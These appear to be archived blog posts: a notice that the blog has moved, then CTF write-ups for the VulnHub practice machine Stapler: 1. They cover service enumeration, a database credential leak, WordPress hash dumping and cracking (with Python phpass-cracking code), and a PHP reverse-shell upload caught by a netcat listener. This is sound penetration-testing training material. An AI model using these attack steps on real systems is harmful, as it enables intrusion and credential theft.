NEW BLOG URL AT KONGWENBIN.COM
June 25, 2018 | Wen Bin KONG | General blog
TL;DR

_This post is written to inform all visitors that this blog is no longer active and to share my new blog's URL, kongwenbin.com._

THANKS FOR VISITING MY BLOG

Dear Subscribers, Readers and Fellow Security Enthusiasts who frequently visit my blog, be it:

* To read my hacking walk-throughs or penetration testing write-ups
* To look for write-ups on Capture-The-Flag (CTF) series
* To seek inspiration and direction in the information security industry
* To seek career advice or read reviews of information security certifications
* To explore learning resources in general
* And much more other stuff, of course

I would like to say a big THANK YOU to you for being so awesome!

THIS BLOG HAS MOVED TO KONGWENBIN.COM

I would like to share the news that this blog will no longer be active. All existing content has been moved to its new URL at https://kongwenbin.com and any future posts will be published over there.

WHY THE SWITCH

The reason is simple. I would like to:

* Set up my own theme instead of being limited to WordPress's existing options
* Install my own plugins, as the free WordPress version doesn't allow installation of plugins
* Have more motivation to blog. Well, who knows; I might post more frequently after I have accomplished items 1 & 2
* Because I can

That's all for this post, I'll see you guys there then. Cheerios!
WRITE-UP FOR STAPLER: 1 – A DIFFERENT PATH
April 30, 2018 | Wen Bin KONG | CTF, Resources
Tags: CTF, exploit, hacking, linux, oscp, privilege escalation, unix, vm, Vulnerabilities, vulnhub, wordpress, writeup
This post is an addendum to my recent article, the Write-up for Stapler: 1. In the original post, I gained a low privilege shell using credentials which I obtained through SMB enumeration. Remember I mentioned that I had not looked into ports 3306 and 12380 yet and would look into them when I had some time? And I did, over the last weekend.

Once again, the short intro: Stapler: 1 is a vulnerable machine created by g0tmi1k and downloadable for free on VulnHub. It is a very good practice machine if you are pursuing the OSCP certification (read about my OSCP journey).
ENUMERATION ON PORT 3306

The following was discovered through the initial nmap scan:

> 3306/tcp open mysql MySQL 5.7.12-0ubuntu1

Let's try to connect to the service using netcat; the server greeting alone leaks the exact version:

> nc 192.168.117.136 3306
> S
> 5.7.12-0ubuntu1

The database credentials came from the WordPress site on port 12380: a vulnerable plugin there made it possible to read the site's wp-config.php. The tail of the recovered file (the DB_NAME, DB_USER and DB_PASSWORD defines sit further up, above the authentication salts):

> -!:<-P#A|k-+:;JzV8*pZ|K/U*J];5P}hM-uJ%^+9=0SBQEh#ga_9:hJ');
> /**#@-*/
> /**
>  * WordPress Database Table prefix.
>  *
>  * You can have multiple installations in one database if you give each a unique
>  * prefix. Only numbers, letters, and underscores please!
>  */
> $table_prefix = 'wp_';
> /**
>  * For developers: WordPress debugging mode.
>  *
>  * Change this to true to enable the display of notices during development.
>  * It is strongly recommended that plugin and theme developers use WP_DEBUG
>  * in their development environments.
>  */
> define('WP_DEBUG', false);
> /* That's all, stop editing! Happy blogging. */
> /** Absolute path to the WordPress directory. */
> if ( !defined('ABSPATH') )
>     define('ABSPATH', dirname(__FILE__) . '/');
> /** Sets up WordPress vars and included files. */
> require_once(ABSPATH . 'wp-settings.php');
> define('WP_HTTP_BLOCK_EXTERNAL', true);

Now we have the credentials for MySQL: root / plbkac. The database listens on 3306 (12380 is the Apache port), so connect there. That the server accepts root from a remote host at all is a misconfiguration in its own right, independent of the leaked password.

> mysql -uroot -pplbkac -h 192.168.117.136 -P 3306
> Warning: Using a password on the command line interface can be insecure.
> Welcome to the MySQL monitor. Commands end with ; or \g.
> Your MySQL connection id is 48
> Server version: 5.7.12-0ubuntu1 (Ubuntu)
> Copyright (c) 2000, 2016, Oracle and/or its affiliates. All rights reserved.
> Oracle is a registered trademark of Oracle Corporation and/or its
> affiliates. Other names may be trademarks of their respective owners.
> Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
>
> mysql> show databases;
> +--------------------+
> | Database           |
> +--------------------+
> | information_schema |
> | loot               |
> | mysql              |
> | performance_schema |
> | phpmyadmin         |
> | proof              |
> | sys                |
> | wordpress          |
> +--------------------+
> 8 rows in set (0.01 sec)
>
> mysql> use wordpress;
> Reading table information for completion of table and column names
> You can turn off this feature to get a quicker startup with -A
> Database changed
> mysql> show tables;
> +-----------------------+
> | Tables_in_wordpress   |
> +-----------------------+
> | wp_commentmeta        |
> | wp_comments           |
> | wp_links              |
> | wp_options            |
> | wp_postmeta           |
> | wp_posts              |
> | wp_term_relationships |
> | wp_term_taxonomy      |
> | wp_terms              |
> | wp_usermeta           |
> | wp_users              |
> +-----------------------+
> 11 rows in set (0.00 sec)

Now we check the list of users stored in the wp_users table:

> mysql> select user_login,user_pass from wp_users;
> +------------+------------------------------------+
> | user_login | user_pass                          |
> +------------+------------------------------------+
> | John       | $P$B7889EMq/erHIuZapMB8GEizebcIy9. |
> | Elly       | $P$BlumbJRRBit7y50Y17.UPJ/xEgv4my0 |
> | Peter      | $P$BTzoYuAFiBA5ixX2njL0XcLzu67sGD0 |
> | barry      | $P$BIp1ND3G70AnRAkRY41vpVypsTfZhk0 |
> | heather    | $P$Bwd0VpK8hX4aN.rZ14WDdhEIGeJgf10 |
> | garry      | $P$BzjfKAHd6N4cHKiugLX.4aLes8PxnZ1 |
> | harry      | $P$BqV.SQ6OtKhVV7k7h1wqESkMh41buR0 |
> | scott      | $P$BFmSPiDX1fChKRsytp1yp8Jo7RdHeI1 |
> | kathy      | $P$BZlxAMnC6ON.PYaurLGrhfBi6TjtcA0 |
> | tim        | $P$BXDR7dLIJczwfuExJdpQqRsNf.9ueN0 |
> | ZOE        | $P$B.gMMKRP11QOdT5m1s9mstAUEDjagu1 |
> | Dave       | $P$Bl7/V9Lqvu37jJT.6t4KWmY.v907Hy. |
> | Simon      | $P$BLxdiNNRP008kOQ.jE44CjSK/7tEcz0 |
> | Abby       | $P$ByZg5mTBpKiLZ5KxhhRe/uqR.48ofs. |
> | Vicki      | $P$B85lqQ1Wwl2SqcPOuKDvxaSwodTY131 |
> | Pam        | $P$BuLagypsIJdEuzMkf20XyS5bRm00dQ0 |
> +------------+------------------------------------+
> 16 rows in set (0.00 sec)
> mysql> exit
> Bye
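The dump above shows logins and hashes but not roles, and the next step is to crack whichever account is an administrator. Before spending time on all sixteen hashes it is worth asking the database which ones matter. WordPress keeps roles in wp_usermeta under the key `<table_prefix>capabilities` (so `wp_capabilities` here, from the `$table_prefix = 'wp_'` in wp-config.php) as a serialized PHP array. The following is an added example, not part of the original write-up: it runs that join over a constructed in-memory copy of the two tables (sqlite3 is used only so it runs offline; the SQL is plain enough to paste into the MySQL client as-is). The three user rows are taken from the dump above; which of them hold the administrator role is an assumption made for the example, not something the page states.

```python
import sqlite3

# Constructed stand-in for the Stapler "wordpress" database: the first
# three rows of the wp_users dump from this write-up, plus wp_usermeta
# rows in WordPress's real serialized-capabilities format. The roles
# assigned here (John and Peter as administrators, Elly as editor) are
# assumed for the example.
SAMPLE_USERS = [
    (1, "John", "$P$B7889EMq/erHIuZapMB8GEizebcIy9."),
    (2, "Elly", "$P$BlumbJRRBit7y50Y17.UPJ/xEgv4my0"),
    (3, "Peter", "$P$BTzoYuAFiBA5ixX2njL0XcLzu67sGD0"),
]
SAMPLE_USERMETA = [
    (1, "wp_capabilities", 'a:1:{s:13:"administrator";b:1;}'),
    (2, "wp_capabilities", 'a:1:{s:6:"editor";b:1;}'),
    (3, "wp_capabilities", 'a:1:{s:13:"administrator";b:1;}'),
]


def build_sample_db() -> sqlite3.Connection:
    """In-memory copy of the two tables the role check needs."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT, user_pass TEXT)"
    )
    conn.execute(
        "CREATE TABLE wp_usermeta (user_id INTEGER, meta_key TEXT, meta_value TEXT)"
    )
    conn.executemany("INSERT INTO wp_users VALUES (?, ?, ?)", SAMPLE_USERS)
    conn.executemany("INSERT INTO wp_usermeta VALUES (?, ?, ?)", SAMPLE_USERMETA)
    return conn


def find_admins(conn, table_prefix: str = "wp_") -> list:
    """Return (ID, user_login, user_pass) for every account whose serialized
    capabilities name the administrator role, lowest ID first.

    The meta key is "<prefix>capabilities"; the prefix is $table_prefix from
    wp-config.php. Matching on the quoted role name keeps a role such as
    "administrator_helper" from matching by accident."""
    sql = (
        f"SELECT u.ID, u.user_login, u.user_pass "
        f"FROM {table_prefix}users AS u "
        f"JOIN {table_prefix}usermeta AS m ON m.user_id = u.ID "
        f"WHERE m.meta_key = ? AND m.meta_value LIKE ? "
        f"ORDER BY u.ID"
    )
    params = (table_prefix + "capabilities", '%"administrator"%')
    return [tuple(row) for row in conn.execute(sql, params)]


def john_lines(rows) -> list:
    """user:hash lines in the shape john reads; $P$ hashes are detected as
    the phpass format automatically."""
    return [f"{login}:{user_pass}" for _id, login, user_pass in rows]


if __name__ == "__main__":
    admins = find_admins(build_sample_db())
    print("\n".join(john_lines(admins)))
```

Feeding only the administrator rows to john shortens the cracking run and, more importantly, removes the guesswork about which account is worth logging in with.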
Great, now we have a list of password hashes! These are phpass "portable" hashes (the $P$ prefix), which john recognises as the phpass format on its own. Save them as user:hash lines in hashes.txt and crack them with john. Note that --show only prints what is already in john's pot file, so the actual cracking run (for example with a wordlist) has to come first:

> john --show hashes.txt
> John:incorrect
> Elly:ylle
> barry:washere
> heather:passphrase
> garry:football
> harry:monkey
> scott:cookie
> kathy:coolgirl
> tim:thumb
> ZOE:partyqueen
> Pam:0520
>
> 11 password hashes cracked, 5 left

In this case, there is no need to wait for all the password hashes to be cracked. If you understand a WordPress application, the user with ID 1 is the account created during installation, which is an administrator unless someone changed it later (the wp_capabilities row in wp_usermeta is the authoritative check). Here the first record is John, and we already have his password: incorrect.
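To see what john is actually doing with those $P$ hashes, here is an added example (not code from the original post) implementing the phpass portable scheme WordPress used at the time: MD5 over salt and password, then 2^cost further MD5 rounds (cost is the character after $P$, 'B' = 13, so 8192 rounds), encoded with phpass's own base64 alphabet. It verifies two of the page's own hashes against a small constructed wordlist; the wordlist is a stand-in and the hashes are copied verbatim from the wp_users dump above.

```python
import hashlib
import hmac

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _encode64(data: bytes, count: int) -> str:
    """phpass's own base64 variant (not RFC 4648): 24-bit little-endian
    groups emitted as 6-bit symbols from ITOA64, no padding."""
    out = []
    i = 0
    while i < count:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < count:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= count:
            break
        i += 1
        if i < count:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= count:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)


def phpass_crypt(password: str, setting: str) -> str:
    """Recompute a phpass portable hash from a password and the stored
    hash's 12-character prefix: "$P$" (or "$H$"), one cost character and an
    8-character salt. Digest = MD5(salt||pw), then 2**cost rounds of
    MD5(prev||pw)."""
    if setting[:3] not in ("$P$", "$H$"):
        raise ValueError("not a phpass portable hash")
    count_log2 = ITOA64.index(setting[3])
    if not 7 <= count_log2 <= 30:
        raise ValueError("unsupported cost")
    pw = password.encode()
    digest = hashlib.md5(setting[4:12].encode() + pw).digest()
    for _ in range(1 << count_log2):
        digest = hashlib.md5(digest + pw).digest()
    return setting[:12] + _encode64(digest, 16)


def check_password(password: str, stored: str) -> bool:
    """Constant-time comparison of the recomputed hash with the stored one."""
    return hmac.compare_digest(phpass_crypt(password, stored), stored)


def crack(hashes: dict, wordlist) -> dict:
    """Dictionary attack: first word that verifies wins. Every guess costs
    2**cost MD5 calls, which is the whole point of the scheme compared to a
    bare MD5 of the password."""
    words = list(wordlist)
    cracked = {}
    for user, stored in hashes.items():
        for word in words:
            if check_password(word, stored):
                cracked[user] = word
                break
    return cracked


# Hashes copied from the wp_users dump in this write-up; the wordlist is a
# constructed stand-in for a real one such as rockyou.
STAPLER_HASHES = {
    "John": "$P$B7889EMq/erHIuZapMB8GEizebcIy9.",
    "Elly": "$P$BlumbJRRBit7y50Y17.UPJ/xEgv4my0",
    "Peter": "$P$BTzoYuAFiBA5ixX2njL0XcLzu67sGD0",
}
SAMPLE_WORDLIST = ["password", "123456", "incorrect", "ylle", "letmein"]

if __name__ == "__main__":
    for user, word in crack(STAPLER_HASHES, SAMPLE_WORDLIST).items():
        print(f"{user}:{word}")
```

Peter's hash stays uncracked with this wordlist, which is the same picture as john's "5 left" above: the scheme is not broken, the passwords that fell were simply in the dictionary.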
Using the following credentials, I was able to log in to the WordPress application as an admin user:

> username: john
> password: incorrect

Next, go to Plugins and upload a web shell, such as the very famous Pentestmonkey PHP reverse shell, which is also available on your Kali Linux machine by default at /usr/share/webshells/php/php-reverse-shell.php. Modify the $ip and $port parameters on lines 49 and 50 (your attacking machine's address and the port your listener will use) and you are good to go.

Save it as reverse.php and upload it as a new plugin. The installer cannot unpack a bare .php file, since it expects a zip archive, but the upload is saved under wp-content/uploads/ before that check fails, which is why the shell can be requested from there. Now, set up a netcat listener on local port 4444 to catch the reverse shell from the Stapler machine:

> nc -nlvp 4444
> listening on [any] 4444 ...

Now, visit https://192.168.117.136:12380/blogblog/wp-content/uploads/reverse.php to trigger the reverse shell connection. Observe the changes on your listener:

> connect to [192.168.117.134] from (UNKNOWN) [192.168.117.136] 36962
> Linux red.initech 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux
>  16:08:13 up 1 day,  1:59,  0 users,  load average: 0.00, 0.01, 0.05
> USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
> uid=33(www-data) gid=33(www-data) groups=33(www-data)
> /bin/sh: 0: can't access tty; job control turned off
> $ pwd
> /
> $ uname -a
> Linux red.initech 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux

With this, we have successfully gained entry through an alternative path to a low privilege shell: exploiting a vulnerable WordPress plugin to obtain its configuration file, using the SQL credentials in it to dump the user password hashes, cracking the WordPress admin account's password, and uploading a reverse shell. I hope you enjoyed reading this write-up.

-------------------------
If you like this post, please check out my other similar write-ups as well:

* Write-up for Stapler: 1
* Write-up for FristiLeaks v1.3
* Write-up for Kioptrix: 2014 (#5)
* Write-up for Kioptrix: Level 1.3 (#4)
* Write-up for Kioptrix: Level 1.2 (#3)
* Write-up for Kioptrix: Level 1.1 (#2)
* Write-up for Kioptrix: Level 1 (#1)
WRITE-UP FOR STAPLER: 1
April 22, 2018 (updated April 30, 2018) | Wen Bin KONG | CTF, Resources
Tags: CTF, exploit, hacking, kali, kernel, linux, oscp, privesc, privilege escalation, Resources, smb, tools, tutorial, vulnhub, Web, writeup
This is another write-up for a VulnHub machine, Stapler: 1. It's a vulnerable machine created by g0tmi1k, a pretty famous person amongst folks who have completed their OSCP journey (read about my OSCP journey).

After downloading the machine, read the content of Stapler_readme.txt. It says that there are at least 2 different paths to getting a limited shell and at least 3 different ways to getting a root shell. Well, this sounds pretty exciting. Let's get started!

HOST DISCOVERY
Use netdiscover to identify the hosts in my network:

> $ ifconfig eth0 | grep -i 192.168.117
> inet 192.168.117.134 netmask 255.255.255.0 broadcast 192.168.117.255
> $ netdiscover -r 192.168.117.0/24
> 192.168.117.136 00:0c:29:3b:8b:40 1 60 Unknown vendor
SERVICE DISCOVERY
> nmap -sS -Pn -T4 -p- 192.168.117.136
> PORT      STATE SERVICE
> 21/tcp    open  ftp
> 22/tcp    open  ssh
> 53/tcp    open  domain
> 80/tcp    open  http
> 139/tcp   open  netbios-ssn
> 666/tcp   open  doom
> 3306/tcp  open  mysql
> 12380/tcp open  unknown

That is quite a number of services! Now, to get their exact version numbers, we run the following:

> nmap -Pn -T4 -O -A -p21,22,53,80,139,666,3306,12380 192.168.117.136
> PORT      STATE SERVICE     VERSION
> 21/tcp    open  ftp         vsftpd 2.0.8 or later
> | ftp-anon: Anonymous FTP login allowed (FTP code 230)
> |_Can't get directory listing: Can't parse PASV response: "Permission denied."
> 22/tcp    open  ssh         OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
> | ssh-hostkey:
> |   2048 81:21:ce:a1:1a:05:b1:69:4f:4d:ed:80:28:e8:99:05 (RSA)
> |   256 5b:a5:bb:67:91:1a:51:c2:d3:21:da:c0:ca:f0:db:9e (ECDSA)
> |_  256 6d:01:b7:73:ac:b0:93:6f:fa:b9:89:e6:ae:3c:ab:d3 (EdDSA)
> 53/tcp    open  domain      dnsmasq 2.75
> | dns-nsid:
> |_  bind.version: dnsmasq-2.75
> 80/tcp    open  http        PHP cli server 5.5 or later
> |_http-title: 404 Not Found
> 139/tcp   open  netbios-ssn Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP)
> 666/tcp   open  doom?
> | fingerprint-strings:
> |   NULL:
> |     message2.jpgUT
> |     QWux
> |     "DL[E
> |     #;3[
> |     \xf6
> |_    u(+[KN\x17\x0F~q
> 3306/tcp  open  mysql       MySQL 5.7.12-0ubuntu1
> |_ Auth Plugin Name: 88
> 12380/tcp open  http        Apache httpd 2.4.18 ((Ubuntu))
> |_http-server-header: Apache/2.4.18 (Ubuntu)
> |_http-title: Tim, we need to-do better next year for Initech
> Device type: general purpose
> Running: Linux 3.X|4.X
> OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
> OS details: Linux 3.10 - 4.8, Linux 3.16 - 4.6, Linux 3.2 - 4.8
> Network Distance: 1 hop
> Service Info: Host: RED; OS: Linux; CPE: cpe:/o:linux:linux_kernel
> Host script results:
> |_clock-skew: mean: 7h59m23s, deviation: 0s, median: 7h59m23s
> |_nbstat: NetBIOS name: RED, NetBIOS user:
Just looking at the output, I can already see several ways to gain a foothold into the target server. _Please note that this write-up may not cover ALL the possible ways of gaining root on this box. However, I strongly encourage you to try to find all possible ways for the sake of learning._

ENUMERATION ON PORT 80

Let's look at port 80:

> 80/tcp open http PHP cli server 5.5 or later

Seems like nothing is there. Run a directory buster and see if there are any low hanging fruits:

> dirb http://192.168.117.136
> ---- Scanning URL: http://192.168.117.136/ ----
> + http://192.168.117.136/.bashrc (CODE:200|SIZE:3771)
> + http://192.168.117.136/.profile (CODE:200|SIZE:675)

Download both files to see their content:

> wget http://192.168.117.136/.profile
> wget http://192.168.117.136/.bashrc

After reviewing their content, I can conclude that there isn't anything interesting there.

ENUMERATION ON PORT 666

> 666/tcp open doom?

Now, let's connect to port 666 to see what it is. Wow. Just. Wow. What was this? Although there was a message2.jpg being mentioned at the start of its content, it was confirmed that this is not an image. (A file name immediately followed by "UT", as in the nmap fingerprint, is what a zip local file header looks like, UT being the Info-ZIP timestamp extra field; the quick check is to save the stream to disk with nc and run file on it.) Let's not dwell too long on this.

ENUMERATION ON PORT 139

> 139/tcp open netbios-ssn Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP)
When I see an SMB service running on a Linux box, I will run enum4linux to check things out:

> enum4linux -a 192.168.117.136
>  ========================================
> |    Session Check on 192.168.117.136    |
>  ========================================
> Server 192.168.117.136 allows sessions using username '', password ''
>
>  =========================================
> |    OS information on 192.168.117.136    |
>  =========================================
> Got OS info for 192.168.117.136 from srvinfo:
>         RED            Wk Sv PrQ Unx NT SNT red server (Samba, Ubuntu)
>         platform_id     :       500
>         os version      :       6.1
>         server type     :       0x809a03
>
>  ============================================
> |    Share Enumeration on 192.168.117.136    |
>  ============================================
> WARNING: The "syslog" option is deprecated
>         Sharename       Type      Comment
>         ---------       ----      -------
>         print$          Disk      Printer Drivers
>         kathy           Disk      Fred, What are we doing here?
>         tmp             Disk      All temporary files should be stored here
>         IPC$            IPC       IPC Service (red server (Samba, Ubuntu))
>         Server               Comment
>         ---------            -------
>         Workgroup            Master
>         ---------            -------
>         WORKGROUP            RED
>
> Attempting to map shares on 192.168.117.136
> //192.168.117.136/print$   Mapping: DENIED, Listing: N/A
> //192.168.117.136/kathy    Mapping: OK, Listing: OK
> //192.168.117.136/tmp      Mapping: OK, Listing: OK
> //192.168.117.136/IPC$     Mapping: OK Listing: DENIED
>
>  ==========================================================================
> |    Users on 192.168.117.136 via RID cycling (RIDS: 500-550,1000-1050)    |
>  ==========================================================================
> Found new SID: S-1-22-1
> Found new SID: S-1-5-21-864226560-67800430-3082388513
> Found new SID: S-1-5-32
>
> Enumerating users using SID S-1-5-32 and logon username '', password ''
> S-1-5-32-544 BUILTIN\Administrators (Local Group)
> S-1-5-32-545 BUILTIN\Users (Local Group)
> S-1-5-32-546 BUILTIN\Guests (Local Group)
> S-1-5-32-547 BUILTIN\Power Users (Local Group)
> S-1-5-32-548 BUILTIN\Account Operators (Local Group)
> S-1-5-32-549 BUILTIN\Server Operators (Local Group)
> S-1-5-32-550 BUILTIN\Print Operators (Local Group)
>
> Enumerating users using SID S-1-5-21-864226560-67800430-3082388513 and logon username '', password ''
> S-1-5-21-864226560-67800430-3082388513-501 RED\nobody (Local User)
> S-1-5-21-864226560-67800430-3082388513-513 RED\None (Domain Group)
>
> Enumerating users using SID S-1-22-1 and logon username '', password ''
> S-1-22-1-1000 Unix User\peter (Local User)
> S-1-22-1-1001 Unix User\RNunemaker (Local User)
> S-1-22-1-1002 Unix User\ETollefson (Local User)
> S-1-22-1-1003 Unix User\DSwanger (Local User)
> S-1-22-1-1004 Unix User\AParnell (Local User)
> S-1-22-1-1005 Unix User\SHayslett (Local User)
> S-1-22-1-1006 Unix User\MBassin (Local User)
> S-1-22-1-1007 Unix User\JBare (Local User)
> S-1-22-1-1008 Unix User\LSolum (Local User)
> S-1-22-1-1009 Unix User\IChadwick (Local User)
> S-1-22-1-1010 Unix User\MFrei (Local User)
> S-1-22-1-1011 Unix User\SStroud (Local User)
> S-1-22-1-1012 Unix User\CCeaser (Local User)
> S-1-22-1-1013 Unix User\JKanode (Local User)
> S-1-22-1-1014 Unix User\CJoo (Local User)
> S-1-22-1-1015 Unix User\Eeth (Local User)
> S-1-22-1-1016 Unix User\LSolum2 (Local User)
> S-1-22-1-1017 Unix User\JLipps (Local User)
> S-1-22-1-1018 Unix User\jamie (Local User)
> S-1-22-1-1019 Unix User\Sam (Local User)
> S-1-22-1-1020 Unix User\Drew (Local User)
> S-1-22-1-1021 Unix User\jess (Local User)
> S-1-22-1-1022 Unix User\SHAY (Local User)
> S-1-22-1-1023 Unix User\Taylor (Local User)
> S-1-22-1-1024 Unix User\mel (Local User)
> S-1-22-1-1025 Unix User\kai (Local User)
> S-1-22-1-1026 Unix User\zoe (Local User)
> S-1-22-1-1027 Unix User\NATHAN (Local User)
> S-1-22-1-1028 Unix User\www (Local User)
> S-1-22-1-1029 Unix User\elly (Local User)
Well, that is a lot of information! First, let's store the list of possible usernames identified using SID S-1-22-1 and logon username '', password '' (the thirty S-1-22-1 lines at the end of the output above) in userlist.txt. There may be a situation where you need them to brute force some service, such as SSH. The S-1-22-1 SIDs are Samba's "Unix Users" authority, so the last RID component is each account's uid on the box, which is also worth keeping. Some basic amendment turns the file into a proper list of only usernames:

> cat userlist.txt | cut -d"\\" -f2 | cut -d" " -f1 >> users.txt

Now you have a nice list:

> cat users.txt
> peter
> RNunemaker
> ETollefson
> DSwanger
> AParnell
> SHayslett
> MBassin
> JBare
> LSolum
> IChadwick
> MFrei
> SStroud
> CCeaser
> JKanode
> CJoo
> Eeth
> LSolum2
> JLipps
> jamie
> Sam
> Drew
> jess
> SHAY
> Taylor
> mel
> kai
> zoe
> NATHAN
> www
> elly
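The cut pipeline above does the job for one run. When enum4linux output has to be processed repeatedly it is worth pulling out everything that drives the next steps in one pass: whether a null session is accepted, which shares can be both mapped and listed anonymously, and the Unix accounts (with their uids) exposed by RID cycling, skipping Samba's built-in groups and the RED\nobody pseudo-account. The following is an added example, not from the original post; it runs over a constructed excerpt in enum4linux's line format abridged from the output shown above (only four of the thirty Unix users are kept), and the "[+]" prefix on the session line is enum4linux's own.

```python
import re

# Constructed excerpt in enum4linux -a line format, abridged from the output
# in this write-up.
SAMPLE_ENUM4LINUX = r"""
 ========================================
|    Session Check on 192.168.117.136    |
 ========================================
[+] Server 192.168.117.136 allows sessions using username '', password ''

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        kathy           Disk      Fred, What are we doing here ?
        tmp             Disk      All temporary files should be stored here
        IPC$            IPC       IPC Service (red server (Samba, Ubuntu))

//192.168.117.136/print$   Mapping: DENIED, Listing: N/A
//192.168.117.136/kathy    Mapping: OK, Listing: OK
//192.168.117.136/tmp      Mapping: OK, Listing: OK
//192.168.117.136/IPC$     Mapping: OK Listing: DENIED

S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-21-864226560-67800430-3082388513-501 RED\nobody (Local User)
S-1-5-21-864226560-67800430-3082388513-513 RED\None (Domain Group)
S-1-22-1-1000 Unix User\peter (Local User)
S-1-22-1-1001 Unix User\RNunemaker (Local User)
S-1-22-1-1005 Unix User\SHayslett (Local User)
S-1-22-1-1029 Unix User\elly (Local User)
"""

NULL_SESSION = "allows sessions using username '', password ''"
SHARE_MAP_RE = re.compile(
    r"^//(?P<host>\S+?)/(?P<share>\S+)\s+Mapping:\s*(?P<map>\w+)[,\s]+Listing:\s*(?P<list>\S+)"
)
SID_USER_RE = re.compile(
    r"^(?P<sid>S-1-[\d-]+)\s+(?P<domain>.+?)\\(?P<name>\S+)\s+"
    r"\((?P<kind>Local User|Local Group|Domain Group)\)$"
)


def parse_enum4linux(text: str) -> dict:
    """Extract null-session status, anonymously readable shares and Unix
    accounts from enum4linux output.

    S-1-22-1-<uid> is Samba's "Unix Users" authority, so the trailing RID is
    the account's uid; other authorities (BUILTIN, the machine SID) are
    groups or Samba pseudo-accounts and are skipped."""
    result = {"null_session": False, "readable_shares": [], "users": []}
    seen = set()
    for raw in text.splitlines():
        line = raw.strip()
        if NULL_SESSION in line:
            result["null_session"] = True
            continue
        m = SHARE_MAP_RE.match(line)
        if m:
            if m["map"] == "OK" and m["list"] == "OK":
                result["readable_shares"].append(m["share"])
            continue
        m = SID_USER_RE.match(line)
        if m and m["kind"] == "Local User" and m["domain"] == "Unix User":
            name = m["name"]
            if name not in seen:
                seen.add(name)
                uid = int(m["sid"].rsplit("-", 1)[1])
                result["users"].append((uid, name))
    return result


def user_wordlist(parsed: dict) -> str:
    """One login per line, the shape hydra -L expects."""
    return "\n".join(name for _uid, name in parsed["users"]) + "\n"


if __name__ == "__main__":
    parsed = parse_enum4linux(SAMPLE_ENUM4LINUX)
    print(parsed)
    print(user_wordlist(parsed), end="")
```

Keeping the uid next to each name pays off later: it is what tells you which files an FTP session as that user can read, and which local account a cracked password belongs to.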
Back to the enum4linux output, this line is particularly interesting:

> kathy Disk Fred, What are we doing here?

Let's connect directly to the shares to check out the content using smbclient:

> smbclient -L 192.168.117.136 -N
>         Sharename       Type      Comment
>         ---------       ----      -------
>         print$          Disk      Printer Drivers
>         kathy           Disk      Fred, What are we doing here?
>         tmp             Disk      All temporary files should be stored here
>         IPC$            IPC       IPC Service (red server (Samba, Ubuntu))
>         Server               Comment
>         ---------            -------
>         Workgroup            Master
>         ---------            -------
>         WORKGROUP            RED

And now further proceed to read the content in kathy:

> smbclient //192.168.117.136/kathy -N
> smb: \> ls
>   .                                   D        0  Sat Jun  4 00:52:52 2016
>   ..                                  D        0  Tue Jun  7 05:39:56 2016
>   kathy_stuff                         D        0  Sun Jun  5 23:02:27 2016
>   backup                              D        0  Sun Jun  5 23:04:14 2016

Inside kathy_stuff, there is only 1 text file, but we do not have access to read its content:

> smb: \kathy_stuff\> print todo-list.txt
> NT_STATUS_ACCESS_DENIED opening remote file todo-list.txt

The same goes for the backup directory. I don't have any access to view its content, even though I know that once I gain access to it, I can probably view the password of the FTP server through the vsftpd configuration file.

> smb: \backup\> ls
>   .                                   D        0  Sun Jun  5 23:04:14 2016
>   ..                                  D        0  Sat Jun  4 00:52:52 2016
>   vsftpd.conf                         N     5961  Sun Jun  5 23:03:45 2016
>   wordpress-4.tar.gz                  N  6321767  Tue Apr 28 01:14:46 2015
>   19478204 blocks of size 1024. 16396604 blocks available
> smb: \backup\> print vsftpd.conf
> NT_STATUS_ACCESS_DENIED opening remote file vsftpd.conf
> smb: \backup\> print wordpress-4.tar.gz
> NT_STATUS_ACCESS_DENIED opening remote file wordpress-4.tar.gz

One caveat on the commands above: smbclient's print command sends a local file to a printer share, so it opens the remote name for writing, and the ACCESS_DENIED it returns says nothing about whether the file can be read. The command that downloads a file from a disk share is get (get todo-list.txt, get vsftpd.conf), and that is the test to run before concluding that a share is read-protected.

I wonder where the WordPress is being deployed, though. Interesting. For now, let's move on to the next service.

_If you noticed, I am moving on quickly from each discovered service during my enumeration phase._ When performing a security assessment or "hacking", it is very important to understand your target; this is called ENUMERATION. If you try hard enough in your enumeration, you will find something. This is exactly what I am doing now. One tip though: try your best not to get stuck on something for too long; keep moving, be agile.

ENUMERATION ON PORT 21

Let's look at other services, such as the FTP server:

> 21/tcp open ftp vsftpd 2.0.8 or later
> | ftp-anon: Anonymous FTP login allowed (FTP code 230)
> |_Can't get directory listing: Can't parse PASV response: "Permission denied."

Connecting to the service with the ftp client. I know I can log in because nmap has been a great help by checking whether anonymous FTP login is allowed:
> $ ftp 192.168.117.136 21
> Connected to 192.168.117.136.
> 220-
> 220-|-----------------------------------------------------------------------------------------|
> 220-| Harry, make sure to update the banner when you get a chance to show who has access here |
> 220-|-----------------------------------------------------------------------------------------|
> 220-
> 220
> Name (192.168.117.136:root): anonymous
> 331 Please specify the password.
> Password:
> 230 Login successful.
> Remote system type is UNIX.
> Using binary mode to transfer files.
> ftp> ls
> 200 PORT command successful. Consider using PASV.
> 150 Here comes the directory listing.
> -rw-r--r--    1 0        0             107 Jun 03  2016 note
> 226 Directory send OK.

Smooth. Let's download the note and see what is stored in it.

> ftp> get note
> local: note remote: note
> 200 PORT command successful. Consider using PASV.
> 150 Opening BINARY mode data connection for note (107 bytes).
